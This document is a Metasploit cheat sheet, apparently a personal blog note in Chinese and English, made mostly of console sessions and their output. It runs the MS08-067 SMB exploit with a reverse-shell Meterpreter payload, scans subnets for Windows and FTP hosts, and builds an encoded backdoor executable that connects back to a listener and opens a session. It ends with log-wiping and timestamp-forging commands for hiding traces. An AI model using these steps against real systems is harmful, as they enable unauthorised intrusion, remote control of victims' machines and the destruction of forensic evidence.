msfconsole example

http://www.nsfocus.net/index.php?act=alert 漏洞列表

http://blog.csdn.net/chence19871/article/details/7415859  安全工具

 

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.102
RHOST => 192.168.0.102
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.101:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability...

 

smb_version scan, 用于快速扫描网内的windows主机

msf > use auxiliary/scanner/smb/smb_version
msf  auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf  auxiliary(smb_version) > ifconfig | grep inet
[*] exec: ifconfig | grep inet

          inet addr:10.2.3.80  Bcast:10.2.3.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed2:209e/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
msf  auxiliary(smb_version) > set RHOSTS 10.2.3.80/24
RHOSTS => 10.2.3.80/24
msf  auxiliary(smb_version) > set THREADS 5
THREADS => 5
msf  auxiliary(smb_version) > run

[*] 10.2.3.4:445 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:JT-SERVER) (domain:WORKGROUP)
[*] 10.2.3.2:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:JB-PC) (domain:WORKGROUP)
[*] 10.2.3.14:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:***-PC) (domain:WORKGROUP)

 

 ftp version scan, 只扫ftp服务

msf >  use auxiliary/scanner/ftp/ftp_version
msf  auxiliary(ftp_version) > set RHOSTS 10.1.2.58/24
RHOSTS => 10.1.2.58/24
msf  auxiliary(ftp_version) > run
[*] 10.1.2.1:21 FTP Banner: '220-Welcome to Pure-FTPd.\x0d\x0a220-You are user number 1 of 5 allowed.\x0d\x0a220-Local time is now 08:44. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
[*] 10.1.2.11:21 FTP Banner: '220-FileZilla Server version 0.9.40 beta\x0d\x0a220-written by Tim Kosse (Tim.Kosse@gmx.de)\x0d\x0a220 Please visit http://sourceforge.net/projects/filezilla/\x0d\x0a'
[*] 10.1.2.14:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] Scanned 026 of 256 hosts (010% complete)

 attach windows 步骤

Step 1.  use msfpayload to generate a reverse_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=31336  R  | msfencode -t exe -x /root/a.exe -o /tmp/back.exe -e x86/shikata_ga_nai -c 5

Step 2. use msfconsole to open a socket to listen,  transfer back.exe to windows and run it 

msf > use exploit/multi/handler
msf  exploit(handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost 192.168.0.111
lhost => 192.168.0.111
msf  exploit(handler) > set lport 31336
lport => 31336
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.111:31336 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.111:31336 -> 192.168.0.119:1070) at 2013-03-17 22:24:56 +0800

 

db相关，最新版本不再支持mysql和sqlite

msf  auxiliary(smb_version) > db_driver
[-] The db_driver command is DEPRECATED

Because Metasploit no longer supports databases other than the default
PostgreSQL, there is no longer a need to set the driver. Thus db_driver
is not useful and its functionality has been removed. Usually Metasploit
will already have connected to the database; check db_status to see.

[*] postgresql connected to msf3dev
msf  auxiliary(smb_version) > db_status
[*] postgresql connected to msf3dev

 隐藏踪迹指令在meterpreter下使用

1. timestomp

   在meterpreter下用timestomp  -b filename

2. run event_manager

   run event_manager -c